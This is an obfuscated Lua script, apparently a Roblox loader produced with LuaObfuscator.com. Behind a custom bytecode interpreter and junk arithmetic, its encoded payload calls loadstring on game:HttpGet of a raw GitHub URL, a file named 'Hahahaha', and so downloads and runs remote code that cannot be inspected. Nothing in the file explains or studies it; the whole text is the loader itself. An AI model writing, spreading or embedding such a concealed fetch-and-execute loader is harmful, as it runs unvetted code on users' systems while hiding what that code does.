--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==0) then v92=v5(v81,v19);v19=nil;v91=1;end if (v91==1) then return v92;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=877 -(282 + 595) ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((5 -3)^(v32-((1638 -(1523 + 114)) -0))))%((4 -2)^(((v33-1) -(v32-1)) + (620 -(555 + 64)))) ;return v83-(v83%((838 + 94) -(857 + 74))) ;end end else local v84=(570 -(367 + 201))^(v32-(928 -((304 -90) + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37=117 -(32 + (265 -(67 + 113))) ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * (2728093 + 992340 + 13056783)) + (v40 * (66493 -(892 + 65))) + (v39 * 256) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -(7 -4)) ;v37=351 -(87 + 263) ;end end end local function v24() local v42=0 + (0 -0) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==(4 -1)) then if (v47==(952 -(802 + 150))) then if (v46==(438 -(145 + 293))) then return v48 * (0 -0) ;else v47=1 -0 ;v45=0 + (1080 -(1020 + 60)) ;end elseif (v47==(1490 + 557)) then return ((v46==(997 -(915 + 82))) and (v48 * ((2 -1)/((1423 -(630 + 793)) + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1344 -321) ) * (v45 + (v46/((1189 -(1069 + 118))^((396 -279) -65)))) ;end if (v42==2) then v47=v20(v44,45 -24 ,31);v48=((v20(v44,6 + 26 )==((4 -3) -0)) and  -1) or (3 -2) ;v42=862 -(814 + 45) ;end if (v42==(1 + 0)) then v45=792 -(368 + 423) ;v46=(v20(v44,3 -2 ,38 -(10 + 8) ) * (2^(917 -(261 + 246 + 378)))) + v43 ;v42=7 -5 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1748 -((1718 -958) + 987))) then v51=v3(v16,v18,(v18 + v49) -(1914 -(1789 + 124)) );v18=v18 + v49 ;v50=768 -(745 + 21) ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then local v102=0 -0 ;while true do if (v102==(1413 -(447 + 966))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=1 + 0 ;end if (v50==(2 + (0 -0))) then v52={};for v93=1056 -(87 + 968) , #v51 do v52[v93]=v2(v1(v3(v51,v93,v93)));end v50=13 -(1827 -(1703 + 114)) ;end if (v50==(3 + 0)) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (v53==0) then local v87=(function() return 241 -(187 + 54) ;end)();local v88=(function() return;end)();while true do if (v87~=(780 -(162 + 618))) then else v88=(function() return 0 + 0 ;end)();while true do if (v88==(0 + 0)) then local v115=(function() return 0;end)();while true do if (v115~=(1 -0)) then else v88=(function() return 1 -0 ;end)();break;end if (v115~=0) then else v54=(function() return function(v154,v155,v156) local v157=(function() return 0;end)();local v158=(function() return;end)();while true do if (v157~=0) then else v158=(function() return 0 + 0 ;end)();while true do if ((1636 -(1373 + 263))==v158) then v154[v155-#":" ]=(function() return v156();end)();return v154,v155,v156;end end break;end end end;end)();v55=(function() return {};end)();v115=(function() return 1;end)();end end end if (v88==(1001 -(451 + 549))) then v56=(function() return {};end)();v53=(function() return 1 + 0 ;end)();break;end end break;end end end if (v53==(2 -0)) then local v89=(function() return 0;end)();while true do if (v89==1) then v58[ #"-19"]=(function() return v21();end)();v53=(function() return 4 -1 ;end)();break;end if (v89~=0) then else v60=(function() return {};end)();for v110= #"[",v59 do local v111=(function() return 1384 -(746 + 638) ;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (1~=v111) then else v114=(function() return nil;end)();while true do if (v112~=(0 + 0)) then else v113=(function() return v21();end)();v114=(function() return nil;end)();v112=(function() return 1;end)();end if ((1 -0)==v112) then if (v113== #"{") then v114=(function() return v21()~=0 ;end)();elseif (v113==2) then v114=(function() return v24();end)();elseif (v113== #"nil") then v114=(function() return v25();end)();end v60[v110]=(function() return v114;end)();break;end end break;end if (0~=v111) then else local v119=(function() return 341 -(218 + 123) ;end)();while true do if (v119==1) then v111=(function() return 1;end)();break;end if ((1581 -(1535 + 46))~=v119) then else v112=(function() return 0;end)();v113=(function() return nil;end)();v119=(function() return 1 + 0 ;end)();end end end end end v89=(function() return 1 + 0 ;end)();end end end if (v53~=1) then else local v90=(function() return 0;end)();while true do if (v90~=(561 -(306 + 254))) then else v59=(function() return v23();end)();v53=(function() return 2;end)();break;end if (0==v90) then v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v90=(function() return 1;end)();end end end if (v53~=3) then else for v95= #">",v23() do local v96=(function() return v21();end)();if (v20(v96, #"\\", #"\\")==(0 -0)) then local v106=(function() return 1467 -(899 + 568) ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106~=3) then else if (v20(v108, #"xnx", #"gha")== #".") then v109[ #"xnxx"]=(function() return v60[v109[ #"0313"]];end)();end v55[v95]=(function() return v109;end)();break;end if (v106==2) then if (v20(v108, #"\\", #".")== #"]") then v109[2]=(function() return v60[v109[2]];end)();end if (v20(v108,2 + 0 ,2)== #"|") then v109[ #"gha"]=(function() return v60[v109[ #"91("]];end)();end v106=(function() return 3;end)();end if (v106~=1) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(603 -(268 + 335))) then local v123=(function() return 290 -(60 + 230) ;end)();local v124=(function() return;end)();while true do if (v123==0) then v124=(function() return 572 -(426 + 146) ;end)();while true do if (v124==0) then v109[ #"xnx"]=(function() return v22();end)();v109[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"/") then v109[ #"xnx"]=(function() return v23();end)();elseif (v107==2) then v109[ #"nil"]=(function() return v23() -((1 + 1)^(1472 -(282 + 1174))) ;end)();elseif (v107== #"gha") then local v181=(function() return 811 -(569 + 242) ;end)();local v182=(function() return;end)();while true do if (v181==(0 -0)) then v182=(function() return 0 + 0 ;end)();while true do if (v182==0) then v109[ #"gha"]=(function() return v23() -(2^(1040 -(706 + 318))) ;end)();v109[ #"http"]=(function() return v22();end)();break;end end break;end end end v106=(function() return 2;end)();end if (v106~=(1251 -(721 + 530))) then else local v117=(function() return 1271 -(945 + 326) ;end)();local v118=(function() return;end)();while true do if (v117==(0 -0)) then v118=(function() return 0;end)();while true do if (v118==0) then local v165=(function() return 0;end)();while true do if (v165==0) then v107=(function() return v20(v96,2, #"asd");end)();v108=(function() return v20(v96, #"asd1",6 + 0 );end)();v165=(function() return 1;end)();end if (v165==(701 -(271 + 429))) then v118=(function() return 1;end)();break;end end end if (v118==(1 + 0)) then v106=(function() return 1;end)();break;end end break;end end end end end end for v97= #",",v23() do v56,v97,v28=(function() return v54(v56,v97,v28);end)();end return v58;end end end local function v29(v61,v62,v63) local v64=v61[1501 -(1408 + 92) ];local v65=v61[7 -5 ];local v66=v61[1089 -(461 + 625) ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1289 -(993 + 295) ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v85=0 + 0 ,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + (978 -(553 + 424)) ];else v77[v85]=v74[v85 + 1 + 0 ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do local v86=0 + 0 ;while true do if (((529 -(406 + 123))==v86) or (1659>=2134)) then v79=v67[v71];v80=v79[(4611 -2841) -(1749 + 20) ];v86=(1 -0) + 0 ;end if ((1 + 0)==v86) then if (v80<=(12 -6)) then if (v80<=(1324 -(1249 + 73))) then if (v80<=0) then v77[v79[(1093 -(975 + 117)) + 1 ]]();elseif (v80>((3021 -(157 + 1718)) -(466 + 679))) then v77[v79[4 -(2 + 0) ]]=v63[v79[1 + 2 ]];else local v131=0 -0 ;local v132;local v133;while true do if ((v131==(1900 -(106 + 1794))) or (3260<2355)) then v132=v79[1 + 1 ];v133=v77[v79[1 + 2 ]];v131=(6 -4) -1 ;end if ((v131==(2 -(3 -2))) or (669==4223)) then v77[v132 + (115 -((1022 -(697 + 321)) + 110)) ]=v133;v77[v132]=v133[v79[(5 -3) + 2 ]];break;end end end elseif ((v80<=((1245 -657) -(57 + (1214 -687)))) or (1692<588)) then if (v80>(1430 -(41 + 1386))) then do return;end else v77[v79[105 -(17 + 34 + 52) ]]();end elseif (v80==(4 + 1)) then local v134=0 + 0 ;local v135;local v136;while true do if (v134==(1 -0)) then v77[v135 + (2 -(1 -0)) ]=v136;v77[v135]=v136[v79[7 -3 ]];break;end if (v134==((444 -278) -(122 + 44))) then v135=v79[(1229 -(322 + 905)) -0 ];v136=v77[v79[1 + 2 ]];v134=1 -0 ;end end else v77[v79[(617 -(602 + 9)) -4 ]]=v79[3 + 0 ];end elseif (v80<=(2 + 7)) then if (v80<=(13 -6)) then local v125=65 -(30 + (1224 -(449 + 740))) ;local v126;while true do if ((v125==(0 + 0)) or (4797<3651)) then v126=v79[1259 -(1043 + 214) ];v77[v126]=v77[v126](v13(v77,v126 + ((875 -(826 + 46)) -(949 -(245 + 702))) ,v72));break;end end elseif ((v80>(1220 -(323 + (2808 -1919)))) or (4177>4850)) then local v139=v79[(2 + 3) -3 ];local v140,v141=v70(v77[v139](v13(v77,v139 + ((2479 -(260 + 1638)) -(361 + 219)) ,v79[1978 -(1913 + 62) ])));v72=(v141 + v139) -(321 -(53 + 267)) ;local v142=(440 -(382 + 58)) + 0 ;for v161=v139,v72 do v142=v142 + (414 -(15 + 398)) ;v77[v161]=v140[v142];end else v77[v79[1935 -(565 + 1368) ]]=v63[v79[985 -(18 + (3092 -2128)) ]];end elseif (v80<=(1672 -(1477 + 153 + 31))) then if (v80==(37 -27)) then v77[v79[2]]=v79[2 + 1 ];else do return;end end elseif (v80>((16 -8) + 4)) then local v147=0;local v148;while true do if (v147==(850 -(20 + 830))) then v148=v79[2 + 0 ];v77[v148]=v77[v148](v13(v77,v148 + (305 -(244 + 60)) ,v72));break;end end else local v149=126 -(116 + 10) ;local v150;local v151;local v152;local v153;while true do if (v149==((2 -1) + 1)) then for v183=v150,v72 do local v184=1001 -(938 + 63) ;while true do if ((738 -(542 + 196))==v184) then v153=v153 + (1 -0) ;v77[v183]=v151[v153];break;end end end break;end if ((v149==(1 + 0)) or (400>1111)) then v72=(v152 + v150) -(1 + 0) ;v153=0;v149=2 + 0 ;end if (v149==(0 + 0)) then v150=v79[4 -2 ];v151,v152=v70(v77[v150](v13(v77,v150 + 1 + (1205 -(902 + 303)) ,v79[7 -4 ])));v149=1552 -(1126 + 425) ;end end end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403623Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A7573746172616E646F6D6775792D75782F5765696768742D65766572792D312D7365636F6E642F726566732F68656164732F6D61696E2F486168616861686100083Q0012023Q00013Q001202000100023Q002001000100010003001206000300044Q000C000100034Q000D5Q00022Q00033Q000100012Q000B3Q00017Q00",v9(),...);